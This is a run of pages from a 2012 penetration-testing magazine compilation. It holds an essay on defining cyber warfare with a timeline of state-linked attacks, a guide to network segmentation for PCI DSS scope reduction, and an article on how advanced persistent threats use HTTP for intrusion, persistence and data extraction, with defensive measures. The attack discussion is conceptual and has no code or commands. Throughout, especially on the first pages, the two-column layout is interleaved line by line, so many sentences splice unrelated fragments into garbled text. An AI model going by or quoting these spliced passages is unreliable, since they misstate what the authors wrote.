Let me first start out by trying to explain what Cyber networks and systems to further the national interest
Warfare actually is. I say try because it’s hard to capture on (and off) the Cyberspace battlefield. I realize that
exactly what the definition is. With having this seeming this is such a broad definition that it almost becomes
inability to describe it, I find myself in good company. worthless, but any further narrowing down may make it
At his confirmation hearing for the role of the first Cyber factually incorrect. Wikipedia’s entry on Cyber Warfare
Warfare General in US history, four-star General Keith refers to politically motivated hacking, which I feel is
Alexander could not explain to the Senate Committee wrong because while hacking is certainly a part of it, it
what the exact definition of Cyber Warfare is. This is not the whole of it. Richard Clarke’s definition, as he
has everything to do with the fact that we, as a global wrote it in his book Cyber War, also seems too narrow
civilization, are still trying to figure out what it means because he limits it to an activity performed only by
(culturally) to have all our collective knowledge at our nation states. With this statement he discards non-state
fingertips, all the time. And make no mistake: this is actors and I feel this is a mistake.
exactly what we’ve created through the Internet and Regardless of exact definitions, Cyber Warfare involves
mobile devices capable of internet access. Add to that the use of computer systems and networks with the
the fact that technology changes so rapidly that it’s aim to corrupt, deny or destroy enemy information and
hard to see where we’re going. The final element of information systems, while protecting one’s own. My
uncertainty in this mix is that very few people (if any) friend and fellow publicist Peter Rietveld emailed me an
know or understand where internet technology is used. excellent definition recently that I’d like to share with you:
It’s so pervasive that we may discover entirely new fields
of vulnerabilities, even though they’ve been around for In war, information about your own capabilities and your
decades. SCADA systems are an excellent example of opponents capabilities is the ultimate

THE BEST OF 01/2012 Page 144 http://pentestmag.com


force multiplier. That was true in the time of Hannibal as it newspapers and broadcasters after a statue
is today. In war, communication is another force multiplier. honoring Russian soldiers is moved away from a
Communication and Information are critical conditions city center.
for Command. In the end, it is Command that decides the • June-July 2008: Hundreds of government and
outcome of war. This was also true at the time of Hannibal and corporate Web sites in Lithuania are hacked,
holds true today. Now, information and communication are covered in digital Soviet-era graffiti, implicating
interwoven and inseparable in what we call cyber. Therefore, Russian nationalist hackers.
Cyber War is attacking your opponent’s information and • August 2008: Massive DDoS attacks target
communication multipliers, while defending your own. Georgian government and commercial websites
while Russian tanks roll across its borders.
What is generally called a Cyber Attack is actually an • November 2008: Pentagon systems are attacked,
assault to an existing network or system, in many cases hackers are suspected to be working for Russia.
by exploiting a natural weakness of a program or system, • December 2008: India’s largest bank is attacked by
or a flaw in the software. Seeing as how software is a hacker group from Pakistan, whom India has had
written by humans and thus programming errors are heightened political tensions with for years.
considered unavoidable (though they can be reduced by • January 2009: Large scale DDoS attacks target
stringent quality control), this means that at least for the Kyrgyzstan ISP’s during heightened political tension
foreseeable future weaknesses will continue to exist and with Russia.
thus systems remain at risk to be exploited. • March 2009: A large scale Cyber Espionage
operation is uncovered with command & control
Cyber War – Not New Business servers mostly based in China. The Information
Despite everything you’ve just read, Cyber Warfare Warfare Monitor labels it GhostNet.
is not actually a new concept. It has been around for • April 2009: A cyber attack on Kazakhstan targets
almost 20 years and actual politically motivated cyber a popular news Web site and replaces its content
attacks have been taking place for little over a decade, with false content.
and quite possibly even longer. Let’s have a brief • Summer 2009: Insurgents compromise US
timeline of some politically motivated cyber attacks: unmanned drones with off-the-shelf software worth
$26 and manage to intercept its live video feeds.
• 1998: Major cyber infiltrations take place against • October 2009: USCYBERCOM begins overseeing
US government agencies, the Pentagon, NASA, the protection of US military networks from cyber
various research labs and universities and lasts for threats.
roughly 2 years. Russia is suspected but denies all • January 2010: Cyber attacks take place against
knowledge. It is dubbed Moonlight Maze. Google systems in the second half of 2009, and is
• March 1999: Serbian hackers attack NATO systems in published by McAfee in 2010. China is suspected
retaliation for NATO’s military intervention in Kosovo. to be the culprit. The incident becomes known as
• May 1999: A wave of cyber attacks erupts from Operation Aurora.
China against US government websites after an • June 2010: A major cyber attack targets Iran’s
accidental NATO bombing of the Chinese embassy nuclear enrichment facility at Natanz. The software
in Belgrade. program responsible is dubbed STUXNET. Nation
• April 2001: In incident with a US spy plane over state involvement is heavily suspected.
Hainan, China causes Chinese hacker groups to • December 2010: Major attacks take place against
lash out with cyber attacks at US government sites. Mastercard, Paypal, VISA and PostFinance by
• 2003: A series of successful intrusions on US Anonymous in support of Wikileaks founder Julian
government networks and systems begins and isn’t Assange.
discovered until approximately three years later.
The US government labels the attack Titan Rain Above list is far from complete. There are several
and eventually traces its origins to China. incidents that I know of that could be placed in this list,
• 2006: The US government sets up a military but for the sake of keeping this article from becoming
command to deal with cyber threats dubbed US a history book I’ve kept it somewhat limited. More
Cyber Command (USCYBERCOM). importantly, from 2009 onwards we see a strong rise
• April-May 2007: Cyber attacks believed to be linked in the amount of major cyber attacks each year. Last
to the Russian government bring down the Web year, in 2011, we’ve seen major cyber attacks hitting
sites of Estonia’s parliament, banks, ministries, the news almost weekly, with events such as the

THE BEST OF 01/2012 Page 145 http://pentestmag.com


AUDITING & STANDARDS PENTEST
attacks against RSA and several major attacks by changing their statements, they haven’t really admitted
LulzSec, a more violent splinter group of Anonymous. that they think the threat is real. They’re still wrong, and
Their targets include Sony’s Playstation Network, Fox I’ll tell you why.
Networks, the US Senate and PBS. Google is attacked
again, as are Citigroup and Lockheed Martin. Not even Arguing Semantics
the CIA is safe. Perhaps the most familiar names of Let’s first look at the semantics surrounding Cyber
the last two years are STUXNET and it’s supposed Warfare, because I feel this discussion is most easily
offspring DuQu. concluded. There are several reasons why I believe
that further debate about semantics is futile. Firstly, the
Cyber Warfare – The Way of the Future Press loves military talk. A lot of people do. It sounds
What makes Cyber Warfare so effective is that powerful and ‘cyber weapon’ sounds a lot better than
internet technology brings a lot of computer networks ‘a computer program’. Military talk is generally concise,
and systems within reach of adversaries who would descriptive and sometimes outright aggressive. It can
traditionally have had to physically travel to attack incite Fear quite well, and Fear sells newspapers almost
it. Some by accident (administrators didn’t know or as well as Sex does. It’s also essentially a repeat of the
check that it connected to the internet) or on purpose Hacker/Cracker semantics, where the term Hacker used
(administrators don’t realize the dangers of connecting to refer to someone who only tinkers with something, and
something to the internet, and think it’s convenient) a Cracker was someone who had malign intentions. The
Now, these same adversaries can reach you from the Press kept using Hacker instead of Cracker, and now
comforts of their own home. An added benefit is that, the only people who still make futile attempts to educate
depending on their skill, they may very well obscure people about the difference between the two are purists.
their tracks in such a fashion that they don’t have to Most people have accepted it, and in its stead we now
fear any retribution while doing it. Additionally, internet see the use of the terms White Hat, Black Hat and Grey
technology is getting more pervasive every day. If Hat to define where in the legal spectrum hackers find
something isn’t connected to some kind of network themselves in. In short: the press got a hold of cool lingo
today, it may very well be tomorrow and suddenly and we’ll have to pry it out of their cold, dead hands
become a risk. These are critical departures from the before they’ll give it up. Just for this reason alone, we
way things used to be, and we have to consider the would all be better off to just accept the inevitable and
consequences of that. We can only conclude that Cyber spend our energy on more useful things, but I digress.
Warfare has a bright future. Clearly all the governments
currently developing cyber warfare capabilities have Use Where Applicable
reached the same conclusion. Secondly, within a more limited context, using military
lingo is perfectly valid. Yes, armies can use and abuse
Skepticism cyberspace –and computer technology in general- to
Unfortunately, despite the overwhelming evidence to further their respective national political goals. The art
the contrary, a lot of people (including some who are of War has always been susceptible to innovations in
recognized as experts in the Information Security industry) technology. Cavemen beat each other to a pulp with
are still arguing that Cyber Warfare is overhyped. They sticks until someone considered a sharpened piece of
believe the threat is blown out of proportion by people rock made it easier. And then one of them figured that
who stand to make a lot of money from protecting us sharpening the stick on one end worked very well too.
against this threat. A few years ago, these same people The next guy considered that if you applied a string
stated that Cyber Warfare was complete nonsense and of pig-gut and shoot arrows, you could kill someone
that the threat flat-out didn’t exist, but they have seem to from even further away. Make no mistake: these are
come around a bit. Now, after the discovery of the much- all technological innovations that had both military and
debated and highly successful cyber attack labeled non-military applications. The only difference is that for
STUXNET, which targeted centrifuges in Iran’s Natanz many of these things, it almost seems obvious, doesn’t
nuclear enrichment facility, many of these experts have it? With cyberspace, it’s military application may not be
started backpedalling by changing their statements. obvious to everyone. That too, is nothing new. You may
They now argue that the threat is real, but that we be surprised to learn that airplanes weren’t immediately
shouldn’t use military language to describe it because used in combat either. In contrast, these days ‘air
talk of war incites thoughts of war and it -and this is their superiority’ is one of the most heavily contested areas
main grievance- enables the military industrial complex of any battlefield. Cyber Warfare revolves around the
to get fat off this new threat. Please note that even by act of destroying, denying or corrupting the enemy’s

THE BEST OF 01/2012 Page 146 http://pentestmag.com


flows of information, while defending one’s own. however, the attacked country strikes back brutally,
Information is one of the most important (if not the most such sympathy is immediately lost. It also signals to the
important) factors in the outcome of any conflict. Carl enemy that it is now in an all-out war and nothing is off-
von Clausewitz, Prussian General, military theorist limits. This is an undesirable outcome for everyone, and
and the author of On War (Vom Kriege), described a so retaliation is generally done in kind. The unspoken
phenomenon called the Fog of War. The Fog of War rule of I’ll do to you, what you did to me applies in most
is a term used to describe the uncertainty in situation cases. Cyber Warfare would be absolutely perfect in
awareness experienced by participants in military causing complete chaos in any modernized country.
operations. It is essentially a lack of information, and this Imagine if you could completely destabilize your enemy’s
is exactly the area in which Cyber Warfare operates. financial market, shut down its power grid on a national
Most militaries around the world have adopted various level, paralyze its oil industry or shut down its emergency
forms of internet technology to allow for communication; services. None of these examples are military, but they
not just from one soldier to the next, but also in many have a huge effect on any country. At the same time,
other areas such as logistics, radar installations, missile attacking such (civilian) targets will allow your opponent
guidance systems, navigation systems, GPS and to do the same to you, or maybe even worse: start
satellite systems. Of course not all of these systems are bombing you. So yes: the risk is there. But it is unlikely to
directly connected to the internet, but as we have seen actually be a viable option for nation states.
with STUXNET, this is not always an insurmountable This doesn’t mean that we are out of the woods quite
problem to an attacker. In fact two components of the yet though. I’ve only been talking about governments
US Department of Defense network (NIPRNET and and nation states so far. Terrorist groups and criminal
SIPRNET), critical for command and control of US Armed organizations have entirely different motives and some
Forces operations, have been repeatedly breached in the of these may very well cause them to attack exactly
past and neither are supposedly connected directly to the in such a fashion. The best solution to this enormous
internet. The ability to attack military systems or networks problem is that everyone takes their own responsibility,
of this sort, and thus being able to impede or cripple one or and starts securing their networks and systems. The
more major functions of an entire military, would be highly internet is a prime example of global cooperation. It
regarded by any nation. This is why militaries of over should stay that way.
120 nations all over the globe are currently developing
operational cyber capabilities. These militaries will refer DON EIJNDHOVEN
to their activities in cyberspace as Cyber Warfare, and Don Eijndhoven has a Bachelor in
will keep using military jargon. To me, this is perfectly IT, majoring in System & Network
reasonable. The terms Air Warfare, Land Warfare and Engineering, with a Minor in Information
Sea Warfare don’t raise eyebrows, and I would argue that Security from the Hogeschool van
Cyber Warfare deserves its place for exactly the same Amsterdam, The Netherlands. He is
reasons. currently pursuing an MBA at Nyenrode
Business University. Among a long list of
Why Richard Clarke is both Right and Wrong professional certi�cations he obtained are
I’ve stated before that Richard Clarke was right to label the titles ISC2 CISSP, C|EH, MCITPro and MCSE 2003: Security.
Cyber Warfare a major national risk. I would like to nuance He has over a decade of professional experience in designing
that statement that he’s right in theory. You see, while so and securing IT infrastructures.
many networks and systems are vulnerable to cyber He is the founder and CEO of Argent Consulting, a cyber
attacks, not all of these are likely targets to the military. security consulting �rm based in the Netherlands, and often
Conflicts don’t generally explode into an all-out war works as a management consultant or infrastructure/security
overnight. In conflicts between nations, there is usually architect. In his spare time he is a public speaker on Cyber
something that is generally called Conflict Escalation Warfare, occasionally works for CSFI and blogs for several
or De-escalation. One soldier shooting another soldier tech-focused websites about the state of cyber security. He is
usually doesn’t immediately trigger a massive bombing a founding member of Netherlands Cyber Doctrine Institute
raid against the other nation’s capitol, and with good (NCDI), a Dutch foundation that aims to support the Dutch
reason. Especially these days, nothing goes unseen by Ministry of Defense in writing proper cyber doctrine. He is
the media. Camera’s are everywhere and the internet also the founder of the Dutch Cyber Warfare Community
allows news to spread globally with lightning speed. If a group on LinkedIn, which serves as a national platform for
country is attacked unprovoked, it will generally garner the Cyber Warfare industry in the Netherlands through forum
sympathy by the rest of the world’s governments. If, discussions and network meetings.

THE BEST OF 01/2012 Page 147 http://pentestmag.com


PENTEST STANDARD

Network Segmentation
The clues to switch a PCI DSS compliance’s
nightmare into an easy path

Although best security practices should be implemented in all


systems of an organization, whether critical or not, the business
needs and the limited capabilities of the organizations to maintain
rigorous security controls cause that the desired balance between
business objectives and security requirements is not often
achieved.

T
his issue opens the need for a security PCI DSS not only apply to systems that store, transmit
architecture distributed in levels of criticality, or process cardholder data but usually the PCI DSS
where the stringent security controls are applied scope is much greater, including management systems,
to critical systems and other more flexible controls are security systems and in many cases all customer
applied to less critical or sensitive systems. processes and infrastructure.
In the case of PCI DSS compliance, the compliance Adequate network segmentation can help
mandates require organizations (merchants, services organizations to reduce the scope and cost of
providers and acquirers) to initiate a detailed analysis implementation and evaluation of PCI DSS. The aim is
of the scope of compliance, discovering in most cases to limit where cardholder data is processed, stored and
the need to take action to isolate the affected processes transmitted to limit the scope of PCI DSS, achieving:
and systems limiting the scope of PCI DSS compliance.
Typically the reduction and limitation of the scope of PCI
DSS is achieved through proper network segmentation,
but before carrying out this network segmentation it is
necessary to understand how to set boundaries in the
area of PCI DSS compliance and which aspects will be
assessed by the QSA auditor in a PCI DSS assessment.
In fact, the misunderstanding of the scope of PCI DSS
causes organizations to believe that compliance
with PCI DSS is much easier than it actually is, and
sometimes these organizations insist on taking a direct
PCI DSS compliance audit without having had proper
advice previously and ending in an unsatisfactory audit
and higher final costs.

Addressing PCI DSS compliance


One of the common problems in addressing PCI DSS
deployments is to make the customer understand that Figure 1. Understanding PCI DSS Scope

THE BEST OF 01/2012 Page 148 http://pentestmag.com


• Reduce the risk, as attention focuses on those • As the company B does not process or manage
areas that require additional controls. cardholder data, since no client shares the data
• Reduce time, effort and cost. with this company, Company B is not required to
• Avoid heavy fines, financial fallout and reputational validate PCI DSS compliance as a service provider.
damage. • Normally companies within their PCI DSS audit
• Cost-effective strategies to manage and protect process include the services of Company B in the
cardholder data. assessment, as the case of the organization A.
• Company B has in its facilities the firewall
The intention is to protect cardholder data from threats management console, another management console
on other networks or environments that could potentially for the IPS, the NTP time server and a RADIUS
affect the cardholder data. It is necessary to evaluate the server for authentication of users in each of the
possible interactions between the PCI DSS environment management consoles.
of the organization and any other environment, such as • Also on the same network there are other servers
network management of a managed service provider. and devices from Company B that are not used for
A scenario that can dramatically complicate compliance services provided to the organization A.
efforts of an organization is when the organization • As the company B has no obligation to validate PCI
hasn’t analyzed in depth the contracted services of third DSS on their own network, there are no guarantees
parties, as an option that ideally would have been valid that the other network components are protected
to reduce the scope by outsourcing; may in some cases with the latest security patches, antivirus, strong
act totally against, expanding PCI DSS scope beyond the access control, etc...
boundaries of the organization. To better understand this • That means that for example a potential security
scenario we will give an example: compromise from the wireless access point, on
which have not changed the default settings, a
• An organization in order to reduce the scope of PCI hacker can completely compromise company B
DSS contracts with Company B firewall and IDS network including the NTP server, RADIUS users
management services and time synchronization. used to manage firewalls of customers and of
• Company B offers the same services on a shared course reaching compromise on this point to PCI
basis for various clients. Company B never DSS network of the organization A.
manages customers’ servers, or access to them at • For this reason, in this scenario the entire network
all, not even the backups. of company B would be within the scope of PCI

Figure 2. Company B network within PCI DSS scope

THE BEST OF 01/2012 Page 149 http://pentestmag.com


PENTEST STANDARD
DSS in organization A, making compliance with the data. Here are some examples of flows or services
standard of something unapproachable. where may appear cardholder data at some point:

This does not mean that companies should not • Processing, storage or transmission of payment
outsource services in the PCI DSS environment, quite transactions.
the opposite as this reduces the scope of PCI DSS but • Service Providers (any service offered on which
it is essential to ensure that outsourcing is not going cardholder data could be transmitted, stored or
to be a security risk and therefore an extension of the processed by the service provider or the customer):
PCI DSS scope. In fact, the same scenario wouldn’t • Web hosting, dedicated servers, housing,
pose the security problems detailed above if Company datacenter
B has had network segmentation for services affected • Network services, administration and systems
by PCI DSS for those who are not. management
• Application Development
PCI DSS Scope • …
To determine how PCI DSS affects the organization, it • Billing / Payment for services with credit card by
is necessary to conduct an evaluation to see how the Internet, telephone, mobile, etc...
cardholder data flows through the organization and to • Customer Services, for example:
analyze where it is critical the storage, processing or • Call-centers (recorded conversations).
treatment of this information, eliminating those that are • Incidents received on paper, for example FAX.
not critical flows. It is necessary that the evaluation of • Incidents received electronically (email,
each of the flows where cardholder data appears is applications, etc.).
considered the starting point (what, when and how • Loyalty Programs.
data is obtained by the organization), the intermediate • Fraud Management.
states (all treatments and locations where cardholder • Booking Management.
data flows) and the end point (if any, how cardholder • ...
data leaves the organization). This analysis should
be conducted in all areas of the organization, since Once all cardholder data flows are identified, it is
it is common that a specified area of the organization important to look for areas where cardholder data can be
ignores that other areas also interact with cardholder consolidated or removed to reduce the scope. With this

Figure 3. Small segment of Company B network included within PCI DSS scope

THE BEST OF 01/2012 Page 150 http://pentestmag.com


information obtained, it can be determined the scope of On the other hand, we must bear in mind that network
PCI DSS. Considering that any other system that is in the segmentation is not a mandatory requirement of PCI
same network area of the system components identified DSS; but a flat network or erroneous or incomplete
in the previous flows is also within the scope of PCI DSS network segmentation can lead:
(even if are not part of the systems that process, store or
transmit cardholder data). • Increased risk for the organization (increased
As mentioned above, PCI DSS requirements apply number of cardholder data, more data locations so
to all system components. System components are more locations to control).
defined as any network component, server or application • Increased cost and difficulty of deploying and
that includes or is connected to the cardholder data maintaining PCI DSS controls.
environment. The cardholder data environment (CDE) • Requirement to perform network and application
is the area of the network cardholder data or sensitive penetration test of all system components in the
authentication data, including: network, whether or not they have anything to do
with cardholder data.
• Firewalls, switches, routers, wireless access points • Vulnerability scan requirements for all internal and
and other network and security devices. external system components on the network, whether
• Servers, for example: web, application, database, or not they have anything to do with cardholder data.
authentication, mail, Proxy, NTP, DNS, etc. • Implement strict audit logs for system all
• Applications, licensed, bespoke, whether internal or components on the network, whether or not they
external (Internet). have anything to do with cardholder data.
• All user computers, laptops, etc... • Configure all system components securely on the
network, whether or not they have anything to do
Importance of Network Segmentation with cardholder data.
Flat networks (or simple) significantly increase the • Code Reviews and Application Firewalls need for
potential exposure of a single violation of data without applications that have nothing to do with cardholder
adequate network protection. data.
• User management and strict account policies for all
• A violation of cardholder data can occur at any system components in the network, whether or not
shop, office or site that accepts payment cards. they have anything to do with cardholder data.
• A flat network leaves all vulnerable systems to the • ….
weakest point. Once achieved access at any point
through the weakest point, an attacker can reach The idea or concept to keep in mind at all times is How
other critical systems in other locations. does other environments or networks security could affect

Figure 4. PCI DSS Scope Analysis

THE BEST OF 01/2012 Page 151 http://pentestmag.com


PENTEST STANDARD
the security of the existing cardholder data environment • Less forensic effort. In the event that a security
(CDE)?. That is, a security problem on the connected incident occurs, the forensic investigation in a limited
network of my managed service provider (MSP), could network segment is much faster and more effectively.
affect the security of our PCI DSS environment?
Without adequate network segmentation, compliance
Benefits of Reducing the Scope of PCI with PCI DSS requirements impact any system and
Compliance employee with access to the network and may require:
Network segmentation of the cardholder environment
can significantly reduce the scope of PCI DSS. Here • 2-factor authentication for remote network access.
are some of the benefits to be gained if the network is • Systems hardening, change control management,
properly segmented: audit logs management and analysis, anti-virus
systems.
• Reduce the scope. From a situation where anyone • Increase of processes and procedures for all
can access the corporate network, to a situation changes and IT tasks.
where specifically authorized users with a business • Inclusion of all applications, even those not dealing
need access to the cardholder data environment. with cardholder data, in future assessments. The
• Number of systems (servers, applications, devices). requirement 6.6 requires that all web applications
Up to each organization, such as a flat network are protected by a firewall application or perform a
containing 100 servers but only 4 processing code review.
cardholder data and its security. In a flat network
architecture or improperly segmented, all system Graphical Example
components are within the scope. However, isolating The following diagram shows a very simple and short
the four servers in a secure segment, only these example of network segmentation, which will show the
servers and traffic to/from this segment should be involvement of PCI DSS on each segment.
within the scope (in addition to other infrastructure On network segment labeled as VLAN 2 there is not
required by PCI DSS). any stored, processed, or transmitted cardholder data
• Less effort. Less effort is necessary to develop and by any system component. In addition, any system
implement security policies to protect the segment component of the segment VLAN 2 cannot access
of what would be needed for an entire network. the segment VLAN 1, where the firewall implements
• Lower cost. A smaller number of system components a secure access control to ensure strict and proper
means lower cost regarding security audits, network segmentation. As a result, the network segment
vulnerability analysis, penetration test, etc... VLAN 2 is out the scope of PCI DSS.

Figure 5. Graphical Example

THE BEST OF 01/2012 Page 152 http://pentestmag.com


On the other hand, in the network segment VLAN 1 • Applications.
cardholder data is transmitted and stored. The following • Users.
describes the functionality of the components shown in • In addition, checks should be implemented on
the diagram: incoming traffic and outgoing traffic.
• Do not allow the exit of cardholder data to another
• DB Server: Stores the PAN, cardholder name and network segment outside of PCI DSS scope.
card expiration date in the database. • Security policies based on user identity or application,
• File Server B: file server for employees, never to identify who has access to what data, not based
stores cardholder data. solely on IP addresses, ports and protocols.
• File Server A: Contains dump files of the database;
it can sometimes contain cardholder data. Examples of bad practices
• E-Mail Server: Sometimes incidents are received
by email containing the full PAN. • Mail server out of the secure network segment, but
• AP (Access Point): wireless access point connected sometimes emails are sent with the PAN encrypted.
to the network segment, so cardholder data may be Although data is encrypted is still cardholder data
transmitted through this channel. so both the mail server and any server, computer or
• Mobile: Blackberry Terminal for some employees to network component that is within the same network
access e-mail. segment are considered within the scope of PCI DSS.
• An application within the scope of PCI DSS allows
The result is that all system components are within the data extraction to files so that the user can manipulate
scope of PCI DSS because they are part of the same them. These files are stored on the computer of the
network segment with those which process cardholder employee or a file server outside of the PCI DSS
data: scope. If these data dumps contain the full PAN,
even encrypted, the file server, employee workstation
• File Server B: Even having anything to do with and any other system component within that network
cardholder data is within the scope for being in the segment is within the scope of PCI DSS.
same network segment.
• Mobile: By accessing email employees can access
cardholder data so is also within the scope.
• Rest: The rest deal directly with cardholder data so
that their involvement is direct.
MARC SEGARRA LÓPEZ
The conclusion is that PCI DSS Requirements (e.g. Senior Security Consultant and Project
penetration test, vulnerability scans, monitoring, Manager
etc..) must be applied to all system components, msegarra@isecauditors.com
including the File Server B and Mobile leading to more
efforts and cost to achieve and maintain PCI DSS
compliance.

Considerations to take into account INTERNET SECURITY AUDITORS


Some considerations to keep in mind for proper network As a Security Consultant
segmentation: working in many industries for
over ten years, Marc Segarra is
• Proper user authentication to access the secure accustomed to advising clients
network segment (cardholder data environment – on all aspects of Information Assurance. Specialized in the
CDE). payment card industry and security best practices, he offers
• Access Lists (ACLs) properly configured. an expert insight into security principles for both clients and
• Access audit logs. security professionals. Currently works for Internet Security
• Anything that oversteps the secure network Auditors as a Senior Security Consultant and Project Manager
segment should be checked, either: and holds CISA, CISSP, ISO27001 LA, PCI QSA, PA-QSA security
• Devices. certi�cations and accreditations.
• Packets. Public Pro�le: http://es.linkedin.com/in/marcsegarralopez
• Protocols. Company Website: http://www.isecauditors.com

THE BEST OF 01/2012 Page 153 http://pentestmag.com


WEB APP PENTESTING

The Significance
Of HTTP And The Web For Advanced Persistent Threats

Initially created in 1989 by Tim Berners-Lee of the CERN, Hypertext


Transfer Protocol (HTTP) was actually launched one year later
and continues to use specifications that date to 1999 – a mere
time lapse of twenty-two years, in the transmission of Web-based
content.

T
he omnipresence of the Web is now a given and difficult to be sure that requests received during
it serves a wide variety of situations, as detailed browsing emanate from the same user. Large scale use
n the non-exhaustive list below: of the Web illustrates the
discrepancy that exists in terms of security versus
• Community applications volume, and this inherent flaw has become a major
• Institutional Web sites IT system issue, making HTTP a preferred vector of
• Online transactions attacks and data compromise.
• Business applications Cybercriminals are aware of the exploitability of
• Intranet/Extranet the Web and have made it their number one target.
• Entertainment Not a week goes by without a an organization being
• Medical data compromised via HTTP:
• Etc.
• Playstation Network (Sony) -> Wordpress version
In response to user requirements and developing problem
needs, content driven by HTTP has become incre- • MySQL (Oracle) -> SQL Injection
asingly rich and dynamic. It even goes as far as • RSA (EMC) -> SQL Injection
incorporating script languages that transform the • TJX -> SQL Injection
Web browser into a universal enhanced client
that espouses different platforms: PC, Mac and The above attacks, conceived and carried out with
Mobile users all form part of the connected masses precise attention to logistics, are by no means an
operating on their chosen platforms. But have innovation, but we now refer to them differently, using
these new privileges arrived without any underlying the term APT: Advanced Persistent Threat.
constraints? Bolstered cyber-activity, the discovery of intrusion and
The race towards sophistication has not been updated legislation entailing mandatory declaration of
accompanied by similar developments in respect of incidents collectively lead to extensive media coverage,
the security and reliability of data circulated across the which in turn amplifies the impact on the image of the
Web. A concrete example is the fact that HTTP does not unfortunate victims that are more often than not high-
provide native support for sessions, and it is therefore profile businesses or international organizations.

THE BEST OF 01/2012 Page 154 http://pentestmag.com


Anatomy of an APT The use of HTTP may be required because different
Advanced Persistent Threats are attacks calculated for areas are often filtered out, leaving only necessary
latent effect and vested with a specific purpose, that of protocols to emerge. HTTP is often left open to allow
retrieving sensitive or critical data. administrators to navigate through these machines, or
Several steps are necessary to reach the goal: to update them.
To remain as stealthy as possible, a strategic backdoor
• The initial intrusion to the Web application or the application server will use
• Continued presence within the IT system HTTP as a direct connection and / or as a tunnel to
• Bounce mechanism and in depth infiltration other applications. During the movement it will not be
• Data extraction filtered and no attention will be drawn to a process that
opens a port unknown to the system.
HTTP plays an important role during the attacks,
firstly because it is predominantly present during the Bounce Mechanisms
various stages, and furthermore because it is often Whenever changes occur witin an IT system, the steps
the only available protocol that can serve as an attack involving initial intrusion and continued presence are
vector. repeated as many times as necessary until it the goal is
attained and sensitive data becomes accessible.
The Initial Intrusion HTTP once again comes into play during these stages
The system is invaded by an attack focused on an area of development because it is predominantly active and
exposed to the public on the Internet. In the case of open between the different areas:
Sony Playstation Network for instance, the intrusion
took place via their blog that used a vulnerable version • Dialogue between server applications
of WordPress. • Web Services
These days it is unusual for any organization to do • Web Administration Interface
without a website, and the latter can range from basic • Etc.
and simple to complex and dynamic.
The website plays the role of a gateway that provides It often happens that security policies contain the
the initial point of entry into an infrastructure. It becomes same weaknesses from one area to another:
an outpost that enables important information to be
gathered in order to successfully carry out the rest of • Exit ports opened
the attack. In addition, depending on the application • Filtering omission on higher level ports
infrastructure location and lack of compartmentalization, • Use of the same default passwords
it is possible for a simple, scarcely-used application to
be found near or on the same server as a business Data Extraction
application. The attack will bounce from the one to Once crucial information is reached, it is necessary
the other, and the business application which will to quit the system as discreetly as possible and
then become accessible and provide more access over a certain length of time. HTTP protocol is often
privileges. enabled for exit without being monitored for several
Retrieval of information is often the vital issue during reasons:
the bounce mechanism and and extended infiltration
intothe system. Some examples of the data targeted: • Machines are often updated using HTTP
• When an administrator logs on to a remote
• User Passwords machine, he will often require access to a website
• Hardware and network destinations -> discovery • Since these areas are often regarded as „safe”
• Connectors to other systems -> new protocols zones, restrictions are lower and controls less strict
• Etc.
What Protective Measures Can Be Deployed?
Continued presence Application security has become major issue in the
After the initial inroads into the structure the next phase business world. Whereas network security is fairly
requires that presence within the system remains conventional and primarily leans on the filtering of
secure. The machine has to be re-accessed and destinations, sources, IP and Ports in most cases,
exploited without arousing the suspicions of system application security is more complex and involves
administrators. applications that are often unique, bespoke and

THE BEST OF 01/2012 Page 155 http://pentestmag.com


WEB APP PENTESTING
deployed with many more specifications relating to hacker once an application has been compromised.
infrastructure. Once this is done, it is necessary to anticipate the
Three steps are necessary to prevent or respond procedures required to analyze, verify and understand
properly to an APT: the attack. We should bear in mind that an area of
the infrastructure in which it is impossible to install a
• Prevention monitoring tool will be very complex to analyze during
• Response an incident. In such a case, it is necessary to predefine
• Forensics the tools and procedures for investigations and / or
monitoring.
Prevention
Ideally, security should be addressed at the very Risk analysis and attack guidelines
beginning, when software and even the application This step allows a precise understanding of risks based
infrastructure are still at the conception stage. It is on the data manipulated by applications.
necessary to follow certain rules which will condition the It has to be carried out by studying web applications,
response to different threats. their operation and business logic.
Once each data component has been identified, it is
Define a Secure Application Infrastructure possible to draw up a list of rules and regulations that
Partition the Network need to be followed by the application infrastructure.
This measure is one of the pillars of the PCI-DSS and
for good reason. Keeping sections separate can limit Developer Training
the impact of an intrusion, making it more difficult to Applications are commonly developed following specific
obtainsatisfaction because of the large number of business imperatives, and often with the added stress
bounces required to attain sensitive data. Each zone of meeting availability deadlines. Developers do not
also deploys a security policy adapted to its content, place security high up on their list of priorities, and it is
whether the flow is inbound or outbound. often overlooked in the process.
Moreover, partitioning allows for easier forensic However, there are several ways to significantly
analysis in case of a compromise. It is easier to reduce risk:
understand the steps and measure the impact and the
depth of the attack when one is able to analyze each • Raising developer awareness of application attacks
area separately. Unfortunately, there are many systems, • OWASP TOP10
described as flat infrastructures, that contain a variety of • WASC TC v2
applications housed in the same area. After an incident • The use of libraries to filter input
has occurred, it is difficult to determine precisely which • Libraries are available for all languages
applications have been compromised and what data • Setting up audit functions, logs and traceability
has been hijacked. • Accurate analysis of how the application works

Separation of Applications Regular Auditing


Applications can be separated using criteria such as Code analysis
data categorization or the level of risk attached to the You can resort to manual code analysis by an auditor, or
application. Clustering provides numerous advantages: to automated analysis by using the tools available to find
vulnerabilities in the source code of web applications.
• It promotes rationalization in the design of These tools often require complex configuration. This
security policies, which are more or less complex step is useful to detect vulnerabilities before going
depending on the type of data and the structure of into production, and thus to fix them before they are
the application to secure exploited.
• It enhances understanding of an attack and by Unfortunately, the practice is only possible if you have
doing so facilitates the search for evidence which access to the source code of the application. Closed
will then be based on the criticality of data and source software packages cannot be analyzed.
complexity of applications
Scanning and penetration testing
Anticipate Possible Outcomes All applications can be scanned and pentested. They
To better understand the scope of an attack, it is also require configuration and / or a thorough analysis of
necessary to anticipate the options available to a the application to determine the credentials necessary

THE BEST OF 01/2012 Page 156 http://pentestmag.com


for navigation or resources to be avoided because of kind of protection. Their position in the application
their capacity to cause significant damage (eg. links infrastructure however is much more critical. They are
enabling the deletion of entries in the database). often located at the heart of sensitive information zones,
These tests have to be reproduced as often as and connected directly via private links to partner
possible, and whenever a change in the application is infrastructures.
put in place by developers. The WSF provides security on the message format
and content, but also on the use of a service. The use
Appropriate Response or production of a web service entails contract between
Traditional firewalls do not filter network application two parties on the type of use (eg. number of messages
protocols, at best, the so-called next-generation model per day, data type etc.). The WSF will also serve to
can recognize a type of protocol and filter content in the monitor this function and to ensure respect of SLA
manner of an IPS, by recognizing attack patterns. This between the two parties.
response is clearly inadequate.
